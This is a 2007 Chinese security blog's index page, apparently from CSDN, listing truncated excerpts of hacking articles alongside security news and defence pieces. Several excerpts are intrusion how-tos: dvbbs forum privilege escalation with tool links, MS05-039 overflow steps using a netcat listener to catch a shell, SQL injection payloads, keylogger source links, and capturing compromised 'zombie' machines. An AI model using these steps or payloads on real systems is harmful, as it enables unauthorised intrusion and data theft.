网络安全
天河书阁 VicRestart
《说卦传》曰:“乾、天也,故称乎父。坤、地也,故称乎母。震一索而得男,故谓之长男。巽一索而得女,故谓之长女。坎再索而得男,故谓之中男。离再索而得女,故谓之中女。艮三索而得男,故谓之少男。兑三索而得女,故谓之少女”。
展开
-
动网三部曲(一)dvbbs7.0sp2前台提权
关于这个漏洞网上早就公布了,很多提权工作也都提供了下载。可是最近还是有很多朋友问我怎么操作。为了避免麻烦。我把我知道的都写出来以后大家不要在QQ里问我了。先说一下关于dvbbs7.0sp2的前台提权方法。工具: http://61.232.173.243:83/soft/xiumu/DVBB70SSP2.exe1、先打开需要测试的论坛,版本号必须是dvbbs 7.0sp22、注册一个用户3、打开测转载 2007-06-21 17:05:00 · 958 阅读 · 0 评论 -
《黑客X档案2007配套光盘》2007年上半年合集(6期)
来源:CnFan.Org第一期: http://www.gongcn.com/down/down-19c5080b9a6a17be.asp (650.57M)第二期: http://www.gongcn.com/down/down-c3ff0af142b6d3be.asp (644.92M)第三期: http://www.gongcn.com/down/down-17772e42b59d74cf.转载 2007-06-30 16:33:00 · 1179 阅读 · 0 评论 -
利用ms05039溢出入侵步骤总结篇
1 用ms05039scan扫描可以入侵的主机2 use nc to listen local port,command: nc -vv -l -p 12343 use溢出tool进行溢出,command: ms05039 目标IP 本地IP 1234If you are successful,nc窗口将返回一个shell4 在本地用tftp32.exe建立一个tftp服务器,配置一个木马服务原创 2007-07-06 17:34:00 · 1780 阅读 · 0 评论 -
令人忽略的5900端口
首先把5900端口加进你常用的扫描器. nt服务器的远程管理(所谓hack,就是去远程管理嘛),基于GUI的通常是win的终端连接(3389),pcanywhere(5631),还有就是vnc(5900),让我们来熟悉一下它. VNC——Virtual Network Computing(即虚拟网络计算机系统)是由AT&T开发的各种操作系统之间的相互操作管理系统,使用VNC可以使你在不原创 2007-07-06 17:44:00 · 3590 阅读 · 0 评论 -
隐藏在身边的嗅探器——SMS介绍(图)
现在网上的嗅探器可谓多如牛毛,但是真正功能强大的又可以屈指可数了:NAI sniffer pro、Netxray,微软公司的SMS等等。当然还有许多其它功能强大的,这里就不必一一列举了。 微软的SMS在这么多个软件中,我觉得起码具有两个优势:一是免费的;当然,前提是你具有Windows 2000 Server(或NT Server)或以上的视窗版本的版权。二是与微软平台配合得非常好;虽然简单转载 2007-07-06 17:52:00 · 1959 阅读 · 0 评论 -
安全五步骤使你的电子邮件系统远离威胁
电子邮件因为其成本低、效率高,已成为企业通信的最重要形式。如今,我们的问题不再是“你有电子邮件吗”,而是“你的电子邮件地址是什么?” 不过,电子邮件是其自身成功的受害者,使得电子邮件对企业通信如此吸引人的特性,也对那些将其用作非法目的的家伙充满着吸引力。当今的企业电子邮件系统必须与日益增长的垃圾信息、病毒、网络欺诈或“钓鱼”邮件,以及邮件包含的间谍软件作斗争。除了这些进入网络的威胁,公司还日益转载 2007-07-04 20:53:00 · 1076 阅读 · 0 评论 -
缓冲区溢出原理学习
什么是缓冲区溢出? 缓冲区,简单说来是一块连续的计算机内存区域, 可以保存相同数据类型的多个实例。动态变量在程序运行时定位于堆栈之中。 我们这里只关心动态缓冲区的溢出问题, 即基于堆栈的缓冲区溢出。 进程的内存组织形式 一个进程在内存中被分成三个区域: 文本, 数据和堆栈。 文本区域是由程序确定的, 包括代码(指令)和只读数据。 该区域相当于可执行文件的文本段。 这个区域通常被标转载 2007-07-06 17:53:00 · 1135 阅读 · 0 评论 -
微软英国官方网站遭遇黑客攻击面目全非
本周二,微软英国网站被黑客攻击并且沦陷,在此之后黑客将微软主页更改的一塌糊涂,曾经的公司网页面目全非,画面上一位孩子挥舞着沙特阿拉伯的国旗。 据ZDNET报道,据安全网站Zone H透露,黑客是使用了SQL的方式攻破微软英国网站的,在此之后选择将官方网页更改的一塌糊涂。“通过插入特定HTML代码的方式,用户成功入侵了SQL服务器,并且对网页更新系统进行了破坏。”Zone H发言人表示。微转载 2007-07-04 20:57:00 · 856 阅读 · 0 评论 -
阿D常用注入命令收集整理
我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!//看看是什么权限的and 1=(Select IS_MEMBER(db_owner))And char(124)%2BCast(IS_MEMBER(db_owner) as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HA转载 2007-07-04 22:26:00 · 1186 阅读 · 0 评论 -
Vista致命漏洞 系统10秒钟崩溃
【eNet硅谷动力消息】据国外媒体报道,微软的新一代操作系统Windows Vista日前曝出了一处致命漏洞,在10秒钟内即可让系统崩溃。 众所周知,Windows Vista的最大卖点之一就是其安全性。微软董事长比尔·盖茨也曾表示,微软在Vista的安全方面下了很大功夫,并与其他安全产品做了详尽的对比。 而事实也似乎证实了与此前的Windows系统相比,Windows Vista的安全性转载 2007-06-30 16:31:00 · 822 阅读 · 0 评论 -
黑客守则
黑客守则1) 不恶意破坏系统2) 不修改系统文档3) 不在 bbs 上谈论入侵事项4) 不把要侵入的站点告诉不信任的朋友5) 在 post 文章时不用真名6) 入侵时不随意离开用户主机 7) 不入侵政府机关系统8) 不在电话中谈入侵事项9) 将笔记保管好10) 要成功就要实践11) 不删除或涂改已入侵主机的帐号12) 不与朋友分享已破解的帐原创 2007-06-30 11:38:00 · 1151 阅读 · 0 评论 -
我用“电驴”抓肉鸡(转)
转自:网络我用“电驴”抓肉鸡本文已被黑客手册杂志2007年第三期收录 我用“电驴”抓肉鸡!!难道是放一个“电驴”在路上,等“火鸡”过来,一不小心踩在“电驴”上结果给烫熟了,结果就成“肉鸡”了。很多朋友说抓肉鸡很难,找好肉鸡就更难,其实也不然,关键就在于敢动脑子。没有做不到的事情,只有想不到的事情;“人有多大胆,地有多大产”。闲话少说,且写正传! (一)抓肉鸡工具转载 2007-06-25 18:29:00 · 1308 阅读 · 0 评论 -
键盘记录器Fearless_KeySpy_v2.0源代码
http://download1.csdn.net/down3/20070625/25122835301.zip 键盘记录器Fearless_KeySpy_v2.0源代码 VB 源码大小 ( 167.39 K)原创 2007-06-25 12:29:00 · 1015 阅读 · 0 评论 -
动网三部曲(二)dvbbs7.0sp2后台权限提升
大家在得到了dvbbs的前台权限后,都是很想进一步提升权限。也就是动网的后台管理,大家都知道7.0sp2的版本中,只要得到后台,并且上传文件没有 被删除的情况下,通过备份数据库就可以提到webshell.也就是说,得到了后台相当于得到了这个站的webshell。给大家提供一个工具,只了为了测试一下,请大家遵守国家法律,不要用在违法用途上。工具下载: 点此下载在此说一下,本站提供的工具都是从网上搜集转载 2007-06-21 17:14:00 · 1123 阅读 · 0 评论 -
动网三部曲(三)dvbbs7.1提权
现在动网7.1是最高的版本,也是所有使用动网用户所能升极到的终级版本,但仍然有致命的漏洞。工具下载: 点此下载漏洞原理仍是利用dvbbs7.0sp2的漏洞,但是动网在新的版本中加强了管理员权限反复验证的一个文件。所以提升后登陆了就会进去一个死循环页面。大家可以用老兵提供的可以修改cookie的浏览器来登陆。因为时间有限, 关于dvbbs7.1提权工具我也没有测试成功过,但看了邪恶八进制中的一些技术原创 2007-06-21 17:17:00 · 1332 阅读 · 0 评论 -
网站广告怎样做效果最好?
一、案例名称: 网站广告怎样做效果最好? 二、案例适用: 第七章第八节“网络营销实务” 三、案例来源: 网易 四、案例内容: 2003 年,是中国广告业飞速发展的一年。全国广告业营业总额首次突破千亿大关,达到了 1078 亿元人民币, 19.44% 的增长率创下了六年来增幅的新高。 在中国广告业飞速发展的大环境下, iResearch 的监测数据显示 : 200原创 2007-06-22 22:01:00 · 1318 阅读 · 0 评论 -
利用Javascript进行注入
来源:黯魂的网络日志//作者: kostis90gr//翻译: 黯魂[S.S.T]//本文已发表于《黑客防线》6月刊,版权属于黯魂和《黑客防线》杂志社,转载请务必保持文章完整性,谢谢:)这份指南仅仅是出于报告目的,如果任何人把它用于违法目的,我不负责任.通过使用javascript注入,用户不用关闭网站或者把页面保存在他的PC上就可以改变网站中的内容.这是由他的浏览器的地址栏完成的.命令的语法看上转载 2007-06-25 23:10:00 · 973 阅读 · 0 评论 -
用U盘绕过登录密码进入Windows XP系统
来源:网络所需工具 1.U盘一个 2.Usboot(U盘启动制作软件) 3.winrar(压缩软件) 这个方法我亲自实验过,并且成功的绕过了XP的登陆密码.我在学校机房做过实验,但是文件格式为FAT32,就不知道NTFS的行不行?本来想一起实验的,结果我的光驱在学校机器上用不起(我的光驱有问题,机器太老了!--穷),学校的机器都是FAT32的,没办法!只有下次做了! 先说说思路:方法很简转载 2007-06-26 20:33:00 · 914 阅读 · 0 评论 -
关于DDoS攻击的趋势与防御
来源:电脑报 在探讨DDoS 之前我们需要先对 DoS 有所了解,DoS泛指黑客试图妨碍正常使用者使用网络上的服务,例如剪断大楼的电话线路造成用户无法通话。而以网络来说,由于频宽、网络设备和服务器主机等处理的能力都有其限制,因此当黑客产生过量的网络封包使得设备处理不及,即可让正常的使用者无法正常使用该服务。例如黑客试图用大量封包攻击一般频宽相对小得多的拨接或 ADSL 使用者,则受害者就会发现他转载 2007-06-30 11:21:00 · 916 阅读 · 0 评论 -
菜鸟入侵溢出学习面面俱到(图)
溢出专集---------鉴于网友的意见,特意出这个专集,包括目前已知的的溢出漏洞,没想到我也能够出专集。 我这个人有个缺点就是懒,我觉得能省的就省,所以网上能够找到的文章我就直接抄过来,不想再浪费时间,如果没有只好辛苦一下了。 一 IDQ溢出需要系统和工具:WIN 98/ME/2000/NT,IDQGUI工具。SUPERSCAN扫描器。NC.EXE 本转载 2007-07-06 17:46:00 · 1422 阅读 · 0 评论